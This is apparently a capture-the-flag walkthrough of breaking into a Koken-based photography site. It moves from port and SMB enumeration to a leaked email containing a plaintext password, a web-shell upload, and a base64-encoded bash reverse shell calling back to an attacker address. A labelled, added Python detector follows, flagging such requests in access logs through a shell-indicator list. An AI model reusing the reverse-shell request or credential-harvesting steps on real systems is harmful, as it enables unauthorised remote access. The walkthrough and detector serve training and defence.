Port scan
Port vulnerabilities
Port 80 information gathering:
Two account names
v1n1v131r4
templated
Directory scan with dirsearch
/assets
/*main.js*/
/*
Hielo by TEMPLATED
templated.co @templatedco
Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/
Add a name-resolution entry for the domain
172.16.33.88 templated.co
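Port 8000 information gathering:
Site built with Koken, version 0.22.24
/admin is the login page; it requires an email address and a password
SMB service information gathering
Retrieve the shared files
Retrieve the shared folders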
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
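Account: daisa@photographer.com
Password: babygirl
Successfully logged in to the service on port 8000
Gaining access
The site is built with Koken
Check whether any known vulnerabilities exist
The txt file describes how to upload a web shell through Koken
Visit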
172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i
# Base64-encoded
# The encoded content is a classic reverse shell
Getting a shell
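Seen from the defender's side, the request above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original write-up: a Python detector that decodes base64 tokens in query parameters and flags shell indicators. The log lines, client address and timestamps are constructed sample data, and `scan` and `decode_tokens` are hypothetical names.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines; the last one mirrors the request shown above.
SAMPLE_LOG = [
    '172.16.33.1 - - [20/Jul/2020:12:01:10 -0400] "GET /storage/originals/48/02/photo.jpg HTTP/1.1" 200 48213',
    '172.16.33.1 - - [20/Jul/2020:12:01:12 -0400] "GET /gallery?token=YWJjZGVmZ2hpamtsbW5vcA== HTTP/1.1" 200 310',
    '172.16.33.1 - - [20/Jul/2020:12:03:44 -0400] "GET /storage/originals/48/02/test.php'
    '?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx'
    '|%20base64%20-d|/bin/bash%20-i HTTP/1.1" 200 0',
]

UPLOAD_DIR = "/storage/originals/"  # upload path seen in the write-up
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
INDICATORS = ("/dev/tcp/", "/bin/bash", "/bin/sh", "nc -e", "base64 -d")

def decode_tokens(text):
    """Yield printable ASCII decodings of base64-looking tokens in text."""
    for tok in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            decoded = raw.decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            yield decoded

def scan(lines):
    """Return one finding per query parameter that carries shell indicators."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            views = [value, *decode_tokens(value)]  # raw value plus decodings
            hits = sorted({i for v in views for i in INDICATORS if i in v})
            if hits:
                in_uploads = UPLOAD_DIR in url.path and url.path.endswith(".php")
                findings.append({"line": n, "path": url.path, "param": name,
                                 "script_in_uploads": in_uploads,
                                 "indicators": hits, "decoded": views[1:]})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `script_in_uploads` flag marks the underlying condition worth fixing: a `.php` file being served and executed from the media upload directory.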
Privilege escalation
The executables listed above have the SUID bit set
Privilege escalation succeeded